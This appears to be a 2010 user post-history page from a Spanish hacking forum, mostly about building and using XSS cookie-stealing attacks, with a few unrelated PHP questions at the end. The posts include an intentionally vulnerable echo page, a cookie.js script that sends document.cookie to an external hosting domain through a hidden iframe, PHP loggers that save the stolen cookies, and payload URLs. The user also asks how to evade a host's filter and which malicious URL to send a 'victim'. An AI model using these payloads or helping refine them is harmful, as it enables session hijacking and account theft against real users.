no pasa por que el hosting sea malo, solo tiene un pequeño filtro que quiero saber como evadirlo 
igual gracias por la respuesta
igual gracias por la respuesta
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#22
Nivel Web / Problema con añadimiento en codigo
29 Julio 2010, 04:42 AM
Hola gente miren estaba montando un servidor de pruebas y lo subi a mi@
los codigos son los siguientes:
webv.php
busca.php
pag2.php
cookie.js
cookie.php
esta es la url vulnerable a nivel localhost:
http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script>
El codigo que interpretaria busca.php seria <script src="Http://localhost/cookie.js"</script>
pero mi@ es el siguiente
Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script
alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ?
gracias
los codigos son los siguientes:
webv.php
Código [Seleccionar]
<?php
session_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bienvenidos a XSS testing</title>
</head>
<body><center>
<h1><font color=red>XSS Testing</font></h1></center>
<div align=center>
<form method="post" action="busca.php" >
<input type="text" name="busca" value="Buscador Vulnerable" maxlength="222">
<input type="submit" value="buscar">
</form>
</div>
<br><br><br>
<form method="post" action="pag2.php">
<font color=red>Ingrese su usuario: <input type="text" name="nombre">
<br>
Ingrese su contraseña: </font><input type="password" name="password">
<br>
<input type="submit" value="enviar">
</form>
</body>
</html>busca.php
Código [Seleccionar]
<?php
$bus = $_REQUEST['busca'];
echo ($bus);
?>pag2.php
Código [Seleccionar]
<?php
$user=$_POST['nombre'];
$pass = $_POST['password'];
if ($user == "franco" && $pass == "franco")
{
setcookie("senia", $user."-". $pass, time()+60*60*24*365, "/");
echo "Bienvenido $user";
}
else
{
echo "usuario o contraseña incorrcto:";
}
?>cookie.js
Código [Seleccionar]
document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>");cookie.php
Código [Seleccionar]
<?php
$cookie=$_GET['c'];
$file=fopen('archivo.txt', 'a');
fwrite($file, $cookie.' - ');
fclose($file);
?>
esta es la url vulnerable a nivel localhost:
http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script>
El codigo que interpretaria busca.php seria <script src="Http://localhost/cookie.js"</script>
pero mi@ es el siguiente
Código [Seleccionar]
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
<!-- Inserted by miarroba -->
<script type="text/javascript" src="http://weborama.miarroba.info/?d=hosting&h=pruebas18p.webcindario.com&t=1280371273&k=5c4e108c6ef14544954ee758c7790aa0"></script>
<!-- Inserted by miarroba -->
Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script
alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ?
gracias
#23
Nivel Web / Re: duda xss
25 Julio 2010, 21:22 PM
sisi utilizo mozilla 3.6 miren me quede toda la noche ayer y logre obtener una fucking cookie..
les dejo los codigos
buscador.php
lasla.php
el problema es el siguiente, yo quiero mandar una url a la victima y que sus cookies de esa pagina vulnerable se envien a mi, pero no se que url "maliciosa" mandar... me entienden ?
ya que si mando estO:
me guarda en la cookie lo siguiente:
y ahi no me esta guardando ningun usuario solo lo que puse acontinuacion de la variable palabrita :s
muchas gracias
utilizo mozilla 3.6 miren me quede toda la noche ayer y logre obtener una fucking cookie..les dejo los codigos
Código [Seleccionar]
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input name="palabrita" type="text">
<br>
<input type="submit" value="enviar"></form>
<a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Click here for details</a>
</body>
</html>buscador.php
Código [Seleccionar]
<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
echo $user;
?>
<html>
<head></head>
<body>
<a href="pindex.php"> Pagina 1</a>lasla.php
Código [Seleccionar]
<?php
$cookie = $_GET['cookie'];
$archivo ="datos.txt";
$f = fopen($archivo,"w");
fputs($f, $cookie);
fclose ($f);
?>el problema es el siguiente, yo quiero mandar una url a la victima y que sus cookies de esa pagina vulnerable se envien a mi, pero no se que url "maliciosa" mandar... me entienden ?
ya que si mando estO:
Código [Seleccionar]
<script><a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Volver a la pagina</a></script>
me guarda en la cookie lo siguiente:
Código [Seleccionar]
token=8c610b4ae58115e366123efd8e7b7accd7ba525a2207acc6; u=fra; c=a1305ca10f94f2340770c73e26d427588f236709; user=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Flocalhost%2Flalsa.php%3Fcookie%3D%27 escape%28document.cookie%29%3B%3C%2Fscript%3E;y ahi no me esta guardando ningun usuario solo lo que puse acontinuacion de la variable palabrita :s
muchas gracias
#24
Nivel Web / Re: duda xss
25 Julio 2010, 07:56 AM
sigue sin salirme, sinceramente no se que estoy haciendo mal :S 
#26
Hola gente del foro, estaba en casa intentando practicar xss leyendo tutoriales, pero no me sale :S
miren hize unas paginas vulnerables, pero me sigue sin salir:
pagina: pindex.php
buscador.php
cookies.php
y esta es la url que mando:
el problema es que no me crea el archivo archivo.txt :S
alguien sabe a que se debe.. ? gracias
miren hize unas paginas vulnerables, pero me sigue sin salir:
pagina: pindex.php
Código [Seleccionar]
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>buscador.php
Código [Seleccionar]
<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
?>
<html>
<head></head>
<body>
<a href="indexxx.php"> Pagina 1</a>
</body>
</html>cookies.php
Código [Seleccionar]
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, $cookie);
fclose($fff);
?>y esta es la url que mando:
Código [Seleccionar]
http://localhost/buscador.php?palabrita=
<script>window.location='http://localhost/cookies.php?cookie='+document.cookie;</script>&enviar=;el problema es que no me crea el archivo archivo.txt :S
alguien sabe a que se debe.. ? gracias
#27
PHP / Re: duda con directorios
23 Julio 2010, 02:18 AM
ya se que es esa la diferencia y ademas comprendi la diferencia ( que es lo mas importante creo yo)
pero eso solo provocaba el error ?
pero eso solo provocaba el error ?
#28
PHP / Re: duda con directorios
23 Julio 2010, 01:32 AM
Muchas gracias yoya, pero no entiendo por que en el primer codigo que puse no sucedia eso :s
saludos
saludos
#29
PHP / Re: duda con directorios
22 Julio 2010, 22:52 PM
entonces, en primer lugar estaria leyendo mal los directorios ya que seria asi ?
Código (php-brief) [Seleccionar]
<?
if($direc = opendir("./")) {
echo "Directorio actual";
echo $direc;
echo "<br>";
echo "Archivos: \n";
while (FALSE !==($arc = readdir($direc)))
{
// mi pregunta es si aca podria agregar la funcion filemtime.. eso no me termina de //quedar claro ya que si la agrego me provoca un error :s
//gracias
echo $arc;
echo "<br>";
}
closedir($direc);
?>
#30
PHP / Re: duda con directorios
22 Julio 2010, 17:59 PM
tienes alguna documentacion ? :s
no encuentro nada, mejor dicho siempre encuentro lo mismo y lo que leo no sirve :S
gracias
no encuentro nada, mejor dicho siempre encuentro lo mismo y lo que leo no sirve :S
gracias